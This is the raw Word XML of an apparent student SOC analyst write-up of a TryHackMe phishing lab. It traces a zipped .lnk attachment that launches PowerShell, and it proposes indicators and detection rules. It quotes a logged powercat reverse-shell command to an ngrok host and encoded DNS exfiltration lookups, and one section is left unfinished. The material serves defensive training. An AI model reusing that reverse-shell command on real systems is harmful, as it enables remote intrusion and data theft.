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sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC Detection Engineering &amp; Alert Design</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Prepared by: Barbara Adkins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Role: SOC Analyst</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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary:</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The TryHackMe scenario, Phishing Unfolding,  simulates a real time triage situation.  It is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">neccessary</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to determine if an alert is serious and if so, what to do about it. Below you will see my findings regarding the phishing attack with screenshots.</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In this scenario, a phishing email attack occurred and allowed the bad actor to obtain access to the network beginning with a phishing email.  The impage on the environment is high because access to the system without proper clearance can lead to the loss or misuse of many forms of data, for examples, accounting information, proprietary knowledge or personal information of individual employees.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jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>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8"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it occurred</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preser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An email from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hatmakereurope.xyz</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was sent to </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">michael.ascot@tryhatme.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  with an seemingly urgent subject line and body with an attached file, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ImportantInvoice-Febrary.zip.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="863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Mr. Ascott clicked on the zipped file,  which sysmon detected and the alert showed that a file stream was created in temp files but we see  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ImportantInvoice-Febrary\\invoice.pdf.lnk. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\\invoice.pdf.lnk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This tells us that there was a hidden file in the zipped file.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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5842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Another sysmon alert shows that the launching of the hidden file, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">invoice.pdf.lnk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Which opened powershell and created powercat.cs1.  This allowed a download from github as powershell has a cmdlet, IEX (seen on the third line), which is used in attack scripts which can execute malicious code into memory without writing to disk.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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="85090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Powercat.ps1 was used to create a reverse bridge between the host and the bad actor. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Which could then be used to transfer data between the two.  The -c lets us know it is a command  running on tcp to an endpoint on port 19282. The -e indicates an execution of the powershell code that follows.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="3c444d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="fef2d7" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="3c444d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="3c444d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="fef2d7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="3c444d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c 2.tcp.ngrok.io -p 19282 -e powershell\tEngineVersion=5.1.20348.1366\tRunspaceId=b980ae09-17ad-4495-b218-4b1e52190205\tPipelineId=1\tScriptName=\tCommandLine=      Write-Verbose \"Setting up Stream 1...\" Details: CommandInvocation(Write-Verbose): \"Write-Verbose\"ParameterBinding(Write-Verbose): name=\"Message\"; value=\"Setting up Stream 1...\"","host.name":"win-3450","powershell.command.name":"-","winlog.process.pid":"-","powershell.command.invocation_details.value":"\"Write-Verbose\", \"Setting up Stream 1...\""}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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3">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4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are two nslookup.exe actions associated with this attack:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RmYjEyNGZiMTY1NjZlfQ</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ==.</w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">haz4rdw4re.io</w:t>
        </w:r>
      </w:hyperlink>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VEhNezE0OTczMjFmNGY2ZjA1OWE1Mm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ==.haz4dw4re.io.   </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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I believe that these are an attempt to join two parts of information that can be reassembled into a whole to create the reverse tunnel. </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shd w:fill="1c2538" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="723900"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="1c2538" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1308100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="4380" l="-11859" r="11859" t="-4380"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicators of the malicious email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Sender:  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hatmakereurope.xyz</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  Note that this is not a normal top level domain.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Subject Line:  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FINAL NOTICE: ….Overdue Payment.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  This creates a sense of urgency.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Body of email:  Urgent: Your account is 30 days past due…. Click the attached invoice immediately…    This also creates a sense of urgency so that the user will click without question.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Attachment Name:  ImportantInvoiceFebrary.zip   Note that February is spelled incorrectly, which could have been just a typo but in retrospect is an IOC indicator.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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User Interaction: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Michael Ascot  clicked the zip file in the email which triggered the invoicepdf.lnk being installed</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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload Execution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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See above in the attack breakdown for more information.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After invoice.pdf.lnk was activated that created the two part </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">haz4rdw4re.io</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which allowed for the tunnel creation between the internal host and the external host.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suspicious processes or behavior included  the .lnk script which launched powershell.  The hidden script allowed powercat.ps1 to be used. There were unusual parent/child relationships There were creation of temp files in relation to the malware execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Compromise Activity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STILL NEED TO FIGURE THIS OUT)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sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The sender’s email address:  Did the recipient know them? Did they recognize the top-level domain?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The subject line and body of the email both creating a false sense of urgency.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attachment name:  the misspelling of February  and possibly the timing of the invoice.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After the attachment was open, as soon as the pdf.lnk was detected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Powershell.exe being activated.  This suspicious behavior could have triggered an investigation.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The first three opportunities were found in the email itself. Should those have been noticed the attack may not have been successful. .  The last two could have, once noticed,  triggered an isolation of Mr. Ascots system and minimized any damage caused.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection name: Email Aware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Logic:  If an email is received from an unfamiliar domain, with zipped files or other unusual information, then do not engage until it has been investigated. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Source:  for email attacks, the logs regarding the email itself.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
